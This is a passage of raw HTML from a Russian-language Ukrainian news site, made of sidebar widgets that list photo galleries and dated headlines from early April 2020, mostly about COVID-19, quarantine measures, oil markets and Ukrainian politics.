href="https://enovosty.com/news-auto/full/304-eksperty-rasskazali-kak-pravilno-dezinficirovat-avtomobil-vo-vremya-pandemii" title="Эксперты рассказали, как правильно дезинфицировать автомобиль во время пандемии"><img width="210" height="156" alt="Эксперты рассказали, как правильно дезинфицировать автомобиль во время пандемии" src="https://enovosty.com/wp-content/uploads/2020/04/12-e1585844915910.jpg"></a><a href="https://enovosty.com/news-auto/full/304-eksperty-rasskazali-kak-pravilno-dezinficirovat-avtomobil-vo-vremya-pandemii" title="Эксперты рассказали, как правильно дезинфицировать автомобиль во время пандемии" class="name">Эксперты рассказали, как правильно дезинфицировать автомобиль во время пандемии <span>(6016)</span></a></li></ul></li></ul></div><div class="wiget simple_pr" id="photoPromo" style="background: #ffe3c8;"><div class="caption"><p style=" text-transform: uppercase; font-weight: 700; font-family: arial,verdana,tahoma; margin: 0; display: block; float: left; color: #fff; padding: 0 5px 0 4px; background-color: #f93; height: 17px; font-size: 12px;
"><a style="color: #fff;" href="https://enovosty.com/photo-nedeli">Фото недели</a></p></div><div class="topnews_single slide gallery2" style="width: 168px; height: 230px; padding: 10px 10px 0; background: #fff; margin: 10px;"><ul id="slider_gallery2"><li><ul class="tact"><li id="li0" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=557&pid=12137" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/teni/thumbs/thumbs_shadows08.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Художник, который рисует тенью"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=557&pid=12137" title="Художник, который рисует тенью" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Художник, который рисует тенью</a></li></ul></li><li><ul class="tact"><li id="li1" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=556&pid=12114" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/eda_art/thumbs/thumbs_00.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Еда которая порадуют перфекциониста"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=556&pid=12114" title="Еда которая порадуют перфекциониста" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Еда которая порадуют перфекциониста</a></li></ul></li><li><ul class="tact"><li id="li2" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=555&pid=12093" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/razrez/thumbs/thumbs_00.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Заглянуть внутрь! Предметы, которые разрезали напополам"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=555&pid=12093" title="Заглянуть внутрь! Предметы, которые разрезали напополам" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Заглянуть внутрь! Предметы, которые разрезали напополам</a></li></ul></li><li><ul class="tact"><li id="li3" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=554&pid=12072" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/fotosh_sobaka/thumbs/thumbs_jujichris00.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Невероятные приключениях фотографа и его «гигантской» собаки"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=554&pid=12072" title="Невероятные приключениях фотографа и его «гигантской» собаки" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Невероятные приключениях фотографа и его «гигантской» собаки</a></li></ul></li></ul></div> <div class="cls"></div> <a href="https://enovosty.com/photo-nedeli" class="readMore">Все фото &raquo;</a></div><script>jQuery(document).ready(function($){$('#slider_gallery2').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><style>.topnews_single.gallery2 div.anythingSlider-minimalist-round span.arrow{height:160px}</style><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption" style=""><p style="font-size: 12px; height: 17px; color: #fff; background-color: #346796; padding: 0 5px; display: inline; text-transform: uppercase; font-weight: 700;font-family: arial,verdana,tahoma;">Здоровье</p></div><div class='cls'></div><span class='news_date'>04.04.2020 г.</span><br /><div class="post_news"><span id="post-4800380"><span class="postDate">20:15</span><a class="postTitle" href="https://enovosty.com/zdorove/full/404-nazvana-podavlyayushhaya-covid-19-vlazhnost-vozduxa-issledovanie">Названа подавляющая COVID-19 влажность воздуха, - исследование</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4800378"><span class="postDate">20:00</span><a class="postTitle" href="https://enovosty.com/zdorove/full/404-vrach-iz-nyu-jorka-rasskazal-kak-na-99-procentov-izbezhat-zarazheniya-na-covid-19">Врач из Нью-Йорка рассказал как на 99 процентов избежать заражения на COVID-19</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4800376"><span class="postDate">19:42</span><a class="postTitle" href="https://enovosty.com/zdorove/full/404-koronavirus-mozhet-sprovocirovat-porazhenie-mozga">Коронавирус может спровоцировать поражение мозга</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4800370"><span class="postDate">19:02</span><a class="postTitle" href="https://enovosty.com/zdorove/full/404-ukraincy-kotoryx-evakuirovali-s-bali-razexalis-po-domam">Украинцы, которых эвакуировали с Бали, разъехались по домам</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4800358"><span class="postDate">14:44</span><a class="postTitle" href="https://enovosty.com/zdorove/full/404-vrach-iz-uxani-ischezla-zagadochnym-obrazom-posle-soobshheniya-o-tom-chto-eyo-zastavlyali-molchat-o-covid-19">Врач из Ухани исчезла загадочным образом после сообщения о том, что её заставляли молчать о CoViD-19</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4800320"><span class="postDate">10:40</span><a class="postTitle" href="https://enovosty.com/zdorove/full/404-koshka-sumela-vyzhit-odna-v-dome-i-rodit-kotyat-poka-ee-xozyain-lechilsya-ot-covid-19-foto">Невероятная история: кошка сумела выжить одна в доме и родить котят, пока ее хозяин лечился от COVID-19 (ФОТО)</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4800341"><span class="postDate">07:42</span><a class="postTitle" href="https://enovosty.com/zdorove/full/404-v-ukraine-budet-proizvoditsya-do-7-tysyach-pcr-testov-na-koronavirus">В Украине будет производиться до 7 тысяч ПЦР-тестов на коронавирус</a><br /><div class="postFields"></div></span></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/zdorove">Все здоровье</a></div><div class="wiget simple_line analitika"> <div class="caption"><p style="text-transform: uppercase;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;"><a href="https://enovosty.com/articles">Аналитика</a></p></div><div class="block"><div class="info"><span class="postDate">01.04.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/markets/full/104-rynok-zemli-po-ukrainski-kto-poluchit-naibolshuyu-vygodu-ot-zemelnoj-reformy-chast-2">Рынок земли по-украински. Кто получит наибольшую выгоду от земельной реформы? Часть 2.</a></p><div class="cblock"><a href="https://enovosty.com/markets/full/104-rynok-zemli-po-ukrainski-kto-poluchit-naibolshuyu-vygodu-ot-zemelnoj-reformy-chast-2"><img width="230" alt="Рынок земли по-украински. Кто получит наибольшую выгоду от земельной реформы? Часть 2." src="/wp-content/uploads/2020/03/95439-1_large-e1585636713499.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/markets/full/104-rynok-zemli-po-ukrainski-kto-poluchit-naibolshuyu-vygodu-ot-zemelnoj-reformy-chast-2">В ночь с 30 на 31 марта Верховная Рада (ВР) во втором чтении приняла закон, который должен открыть в Украине рынок сельскохозяйственной земли. Политики ...</a></span></div><div class="block"><div class="info"><span class="postDate">27.03.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/2803-itogi-nedeli-borba-mira-s-koronavirusom-cugcvang-zelenskogo">Итоги недели: Борьба мира с коронавирусом, цугцванг Зеленского и коллапс на границах</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/2803-itogi-nedeli-borba-mira-s-koronavirusom-cugcvang-zelenskogo"><img width="230" alt="Итоги недели: Борьба мира с коронавирусом, цугцванг Зеленского и коллапс на границах" src="/wp-content/uploads/2020/03/be5b6156957a4579348d4b11bd476576-e1585330551910.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/2803-itogi-nedeli-borba-mira-s-koronavirusom-cugcvang-zelenskogo">МВФ поставил украинскому президенту жесткие условия, коронавирус пробрался в разные регионы Украины, а мировая экономика переживает крайне непростые ...</a></span></div><div class="block"><div class="info"><span class="postDate">21.03.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/2103-koronavirus-eto-eshhe-konec-istorii-ili-uzhe-konec-sveta">Коронавирус: это еще конец истории или уже конец света?</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/2103-koronavirus-eto-eshhe-konec-istorii-ili-uzhe-konec-sveta"><img width="230" alt="Коронавирус: это еще конец истории или уже конец света?" src="/wp-content/uploads/2020/03/koronavirus.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/2103-koronavirus-eto-eshhe-konec-istorii-ili-uzhe-konec-sveta">Расхожая мысль о том, что пандемия коронавируса навсегда изменила привычный нам мир, все чаще фигурирует в информационном пространстве, часто обретая ...</a></span></div></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption"><p style="font-weight: 700; font-family: arial,verdana,tahoma; font-size: 12px; text-transform: uppercase; margin: 0; padding: 0; text-align: left;height: 17px;"><a href="https://enovosty.com/news/">Последние новости</a></p></div><div class='cls'></div><span class='news_date'>04.04.2020 г.</span><br /><div class="post_news"> <span id="post-4800380"> <span class="postDate">20:15</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/404-nazvana-podavlyayushhaya-covid-19-vlazhnost-vozduxa-issledovanie">Названа подавляющая COVID-19 влажность воздуха, - исследование</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800378"> <span class="postDate">20:00</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/404-vrach-iz-nyu-jorka-rasskazal-kak-na-99-procentov-izbezhat-zarazheniya-na-covid-19">Врач из Нью-Йорка рассказал как на 99 процентов избежать заражения на COVID-19</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800376"> <span class="postDate">19:42</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/404-koronavirus-mozhet-sprovocirovat-porazhenie-mozga">Коронавирус может спровоцировать поражение мозга</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800367"> <span class="postDate">19:30</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/404-kak-bystro-vosstanovitsya-mirovaya-ekonomika">Последствия пандемии COVID-19: как быстро восстановится мировая экономика</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800374"> <span class="postDate">19:30</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/404-v-chernobylskoj-zone-otchuzhdeniya-nachalsya-masshtabnyj-lesnoj-pozhar">В Чернобыльской зоне отчуждения начался масштабный лесной пожар</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800372"> <span class="postDate">19:14</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/404-klichko-podschital-skolko-lyudi-smogut-eshhe-prosidet-na-karantine-za-svoj-schyot">Кличко подсчитал, сколько люди смогут еще просидеть на карантине за свой счёт</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800370"> <span class="postDate">19:02</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/404-ukraincy-kotoryx-evakuirovali-s-bali-razexalis-po-domam">Украинцы, которых эвакуировали с Бали, разъехались по домам</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800368"> <span class="postDate">18:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/404-lukashenko-pro-podderzhku-biznesa-v-belarusi">Настало время кубышку развязать - Лукашенко про поддержку бизнеса в Беларуси</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800365"> <span class="postDate">17:50</span> <a class="postTitle" href="https://enovosty.com/news_society/full/404-v-niderlandax-reshili-pobedit-koronavirus-kollektivnym-immunitetom">В Нидерландах решили победить коронавирус коллективным иммунитетом</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800369"> <span class="postDate">17:17</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/404-mid-saudovskoj-aravii-v-kremle-lgut-govorya-o-prichinax-razryva-soglasheniya-opek">МИД Саудовской Аравии: В Кремле лгут, говоря о причинах разрыва соглашения ОПЕК+</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800366"> <span class="postDate">16:47</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/404-zhitelyam-stolicy-mogut-zapretit-peredvigatsya-na-avtomobilyax-klichko">Жителям столицы могут запретить передвигаться на автомобилях - Кличко</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800364"> <span class="postDate">16:26</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/404-dva-szenariya-vosstanovlenia-mirovoi-ekonomiki-posle-pandemiyi-prognozy-ekonomistov">Два сценария восстановления мировой экономики после пандемии COVID-19 - прогнозы экономистов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800363"> <span class="postDate">15:09</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/404-v-rf-ubit-storonnik-islamskogo-gosudarstva-podozrevaemyj-v-podgotovke-terakta">В РФ убит сторонник «Исламского государства», подозреваемый в подготовке теракта</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800361"> <span class="postDate">15:01</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/404-byudzhetnyj-pikap-fiat-strada-premera-zaderzhivaetsya">Бюджетный пикап Fiat Strada: премьера задерживается</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800358"> <span class="postDate">14:44</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/404-vrach-iz-uxani-ischezla-zagadochnym-obrazom-posle-soobshheniya-o-tom-chto-eyo-zastavlyali-molchat-o-covid-19">Врач из Ухани исчезла загадочным образом после сообщения о том, что её заставляли молчать о CoViD-19</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800349"> <span class="postDate">14:27</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/404-vremya-komfortnogo-sideniya-na-neftyanoj-igle-zakonchilos-dlya-vsex-eksperty">Время комфортного сидения на «нефтяной игле» закончилось для всех - эксперты</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800357"> <span class="postDate">14:19</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/404-v-kitae-pochtili-pamyat-zhertv-koronavirusa-obyavlen-den-nacionalnogo-traura">В Китае почтили память жертв коронавируса: объявлен день национального траура</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800356"> <span class="postDate">13:25</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/404-kiev-zapustil-mobilnye-brigady-kotorye-delayut-testy-na-koronavirus-doma">Киев запустил мобильные бригады, которые делают тесты на коронавирус дома</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800355"> <span class="postDate">12:45</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/404-v-ukraine-rezko-snizhayutsya-ceny-na-benzin">В Украине резко снижаются цены на бензин</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800354"> <span class="postDate">11:53</span> <a class="postTitle" href="https://enovosty.com/news_society/full/404-ispytaniya-protivokorabelnoj-rakety-neptun-proshli-uspeshno-na-dalnejshuyu-razrabotku-rakety-deneg-net-butusov">Испытания противокорабельной ракеты "Нептун" прошли успешно, на дальнейшую разработку ракеты денег нет - Бутусов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800350"> <span class="postDate">11:26</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/404-samoe-dobroe-kulturnoe-sobytie-mesyaca-mer-pragi-predlagaet-podderzhat-teatry-i-galerei-kupiv-u-nix-bilety-ni-na-chto">Самое доброе культурное событие месяца: Мэр Праги предлагает поддержать театры и галереи, купив у них «билеты ни на что»</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800348"> <span class="postDate">10:47</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/404-sovremennoe-piratstvo-ssha-perexvatili-200-tysyach-masok-prednaznachennyx-dlya-germanii">Современное пиратство: США перехватили 200 тысяч масок, предназначенных для Германии</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800320"> <span class="postDate">10:40</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/404-koshka-sumela-vyzhit-odna-v-dome-i-rodit-kotyat-poka-ee-xozyain-lechilsya-ot-covid-19-foto">Невероятная история: кошка сумела выжить одна в доме и родить котят, пока ее хозяин лечился от COVID-19 (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800341"> <span class="postDate">07:42</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/404-v-ukraine-budet-proizvoditsya-do-7-tysyach-pcr-testov-na-koronavirus">В Украине будет производиться до 7 тысяч ПЦР-тестов на коронавирус</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800345"> <span class="postDate">07:32</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/404-strany-reshivshie-spasat-ne-lyudej-a-ekonomiku-proigrayut-mvf">Страны, решившие спасать не людей, а экономику, проиграют - МВФ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800337"> <span class="postDate">06:55</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/404-rossiya-i-saudovskaya-araviya-mogut-sokratit-ezhednevnuyu-dobychu-nefti">Россия и Саудовская Аравия могут сократить ежедневную добычу нефти</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800347"> <span class="postDate">06:53</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/404-mashiny-podesheveyut-tramp-otmenil-ekonormy-obamy-dlya-avtoproma">Машины подешевеют: Трамп отменил эконормы Обамы для автопрома</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800343"> <span class="postDate">00:03</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/404-v-dnepre-reshili-podgotovit-shestsot-mogil-na-sluchaj-massovoj-gibeli-lyudej">В Днепре решили подготовиться на случай массовой гибели людей - жители в шоке</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>03.04.2020 г.</span><br /><div class="post_news"> <span id="post-4800340"> <span class="postDate">23:39</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/304-putin-nazval-komfortnuyu-dlya-rossii-cenu-na-neft">Путин назвал комфортную для России цену на нефть</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800339"> <span class="postDate">23:30</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/304-kurez-dnya-amerikanskij-aktyor-vorvalsya-v-pryamoj-efir-cbs-news-kotoryj-vela-ego-zhena-video">Курьез дня: Американский актёр ворвался в прямой эфир CBS News, который вела его жена (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800236"> <span class="postDate">22:55</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/304-ves-mir-na-karantine-top-10-foto-domashnih-lybimzev-foto">Весь мир на карантине: ТОП-10 фото домашних любимцев (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800336"> <span class="postDate">22:40</span> <a class="postTitle" href="https://enovosty.com/news_society/full/304-dlya-biznesa-ne-sdelali-voobshhe-nichego-nam-plyunuli-v-lico-i-skazali-zaberite-raspishites-leonid-ostalcev">Для бизнеса не сделали вообще ничего. Нам плюнули в лицо и сказали: заберите-распишитесь - Леонид Остальцев</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800332"> <span class="postDate">21:43</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/304-rossiya-gotova-k-dogovorennostyam-o-sokrashhenii-dobychi-nefti-v-ramkax-opek">Россия готова к договоренностям о сокращении добычи нефти в рамках ОПЕК+</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800313"> <span class="postDate">21:10</span> <a class="postTitle" href="https://enovosty.com/news_society/full/304-v-prage-demontirovali-pamyatnik-marshalu-konevu-foto">Фото дня: В Праге демонтировали памятник маршалу Коневу - был без маски</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800328"> <span class="postDate">20:59</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/304-v-antarktide-uchenye-nashli-ostanki-tropicheskogo-lesa">В Антарктиде ученые нашли останки тропического леса</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800326"> <span class="postDate">20:47</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/304-rossiya-poteryala-ocherednoj-kosmicheskij-sputnik-zloj-odessit">Россия потеряла очередной космический спутник, - Злой Одессит</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800315"> <span class="postDate">20:32</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/304-v-britanii-prodolzhaet-rasti-smertnost-ot-covid-19">В Британии продолжает расти смертность от COVID-19</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800318"> <span class="postDate">20:16</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/304-v-ssha-osnovnye-fondovye-indeksy-opyat-snizhayutsya">В США основные фондовые индексы опять снижаются</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800311"> <span class="postDate">19:44</span> <a class="postTitle" href="https://enovosty.com/news_society/full/304-okkupanty-vydvoryayut-tyazhelobolnyx-iz-orlo">Оккупанты выдворяют тяжелобольных из ОРЛО</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800309"> <span class="postDate">19:12</span> <a class="postTitle" href="https://enovosty.com/news_society/full/304-sbu-razoblachila-boevika-kotoryj-zaminiroval-shest-mostov-na-donbasse">СБУ разоблачила боевика, который заминировал шесть мостов на Донбассе</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800307"> <span class="postDate">18:50</span> <a class="postTitle" href="https://enovosty.com/news_society/full/304-v-ukraine-pereschitali-pensii-rabotayushhim-pensioneram">В Украине пересчитали пенсии работающим пенсионерам</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800304"> <span class="postDate">18:31</span> <a class="postTitle" href="https://enovosty.com/news_society/full/304-v-ukraine-uzhestochili-karantin">В Украине ужесточили карантин: подробности</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800301"> <span class="postDate">17:54</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/304-stalo-izvestno-kak-covid-19-povliyal-na-globalnye-postavki-prodovolstviya">Стало известно, как COVID-19 повлиял на глобальные поставки продовольствия</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800298"> <span class="postDate">17:28</span> <a class="postTitle" href="https://enovosty.com/news_society/full/304-ukraina-otpravlyaet-vrachej-v-italiyu-dlya-pomoshhi-v-borbe-s-covid-19">Украина отправляет врачей в Италию для помощи в борьбе с COVID-19</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800295"> <span class="postDate">16:58</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/304-v-minfine-soobshhili-skolko-ukraina-dolzhna-vyplatit-po-vneshnim-dolgam">В Минфине сообщили, сколько Украина должна выплатить по внешним долгам</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800291"> <span class="postDate">16:22</span> <a class="postTitle" href="https://enovosty.com/news_society/full/304-zhitomirskij-bronetankovyj-zavod-peredal-vsu-sem-bmp-foto">Житомирский бронетанковый завод передал ВСУ семь БМП (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800288"> <span class="postDate">16:01</span> <a class="postTitle" href="https://enovosty.com/news_society/full/304-policejskie-arestovali-chlenov-prestupnoj-gruppy-kotorye-trebovali-s-predprinimatelej-bolee-polumilliona-griven-dolga">Полицейские арестовали членов преступной группы, которые вымогали с предпринимателей несуществующий «долг»</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800285"> <span class="postDate">15:40</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/304-v-nato-soobshhili-o-vysokom-urovne-boevoj-gotovnosti-na-fone-usileniya-voennoj-aktivnosti-rf">В НАТО сообщили о высоком уровне боевой готовности на фоне усиления военной активности РФ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800282"> <span class="postDate">15:04</span> <a class="postTitle" href="https://enovosty.com/news_society/full/304-v-nacbanke-rasskazali-o-prichinax-stabilizacii-grivny">В Нацбанке рассказали о причинах стабилизации гривны</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800280"> <span class="postDate">14:46</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/304-oon-predskazyvaet-massovyj-golod-na-planete-iz-za-pandemii-koronavirusa">ООН предсказывает массовый голод на планете из-за пандемии коронавируса</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800253"> <span class="postDate">14:40</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/304-ukrainskim-voditelyam-napomnili-o-rasprostranennom-shtrafe-chto-vazhno-znat">Украинским водителям напомнили о распространенном штрафе: что важно знать</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800278"> <span class="postDate">14:31</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/304-nazvany-domashnie-zhivotnye-dlya-kotoryx-opasen-koronavirus-issledovanie">Названы домашние животные, для которых опасен коронавирус, - исследование</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800240"> <span class="postDate">14:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/304-korabl-vms-ssha-uss-gabrielle-giffords-vyshel-na-patrulirovanie-v-yuzhno-kitajskoe-more">Корабль ВМС США USS Gabrielle Giffords вышел на патрулирование в Южно-Китайское море</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800276"> <span class="postDate">13:58</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/304-popytka-rossii-dobitsya-snyatiya-sankcij-pod-shumok-borby-s-covid-19-provalilas">Попытка России добиться снятия санкций под шумок борьбы с COVID-19 провалилась</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800260"> <span class="postDate">13:40</span> <a class="postTitle" href="https://enovosty.com/news_society/full/304-s-nachala-karantina-v-ukraine-znachitelno-aktivizirovalis-moshenniki-podrobnosti">С начала карантина в Украине значительно активизировались мошенники: на чем чаще всего спекулируют</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800274"> <span class="postDate">13:34</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/304-vakcina-ot-covid-19-mozhet-poyavitsya-v-blizhajshie-mesyacy">Вакцина от COVID-19 может появится в ближайшие месяцы</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800271"> <span class="postDate">13:23</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/304-tempy-rosta-inficirovannyx-na-covid-19-uskorilis-realnyx-zabolevshix-uzhe-10-mln-chel-vrach-infekcionist-muxarskaya">Темпы роста инфицированных на COVID-19 ускорились, реальных заболевших уже 10 млн чел, - врач-инфекционист Мухарская</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800258"> <span class="postDate">13:20</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/304-my-na-vojne-i-nam-nuzhna-bronya-v-nyu-jorke-medsestry-vyshli-na-akciyu-protesta">«Мы на войне и нам нужна броня»: в Нью-Йорке медсестры вышли на акцию протеста</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800257"> <span class="postDate">13:13</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/304-tramp-spasitel-kak-mir-spasaetsya-ot-cunami-neftyanogo-pereizbytka">Трамп спаситель: Как мир спасается от цунами нефтяного переизбытка</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4800266"> <span class="postDate">13:10</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/304-chem-opasen-plakvenil-protivomalyarijnyj-preparat-dlya-lecheniya-covid-19">Чем опасен «Плаквенил», противомалярийный препарат для лечения коронавируса</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/">Все новости &raquo;</a></div><div 